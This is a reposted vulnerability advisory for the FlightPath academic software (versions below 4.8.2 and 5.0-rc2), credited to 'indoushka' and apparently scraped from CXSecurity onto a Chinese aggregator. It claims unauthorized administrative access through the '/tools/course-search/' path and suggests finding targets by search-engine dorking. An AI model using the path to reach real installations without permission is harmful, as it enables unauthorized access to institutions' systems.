FlightPath < 4.8.2 / < 5.0-rc2 - Unauthorized Administrative Access Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1667573 漏洞类型
发布时间 2019-07-16 更新时间 2019-07-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019070070
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
====================================================================================================================================
| # Title     : FlightPath < 4.8.2 / < 5.0-rc2 - Unauthorized Administrative Access Vulnerability                                  |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               |
| # Vendor    : http://getflightpath.com                                                                                           |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking İn Google Or Other Search Enggine.

[+] Use payload : /tools/course-search/

[+] http://getflightpath.com/sites/getflightpath/demo/4x/flightpath/tools/course-search

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |
                                                                                                                                      |
=======================================================================================================================================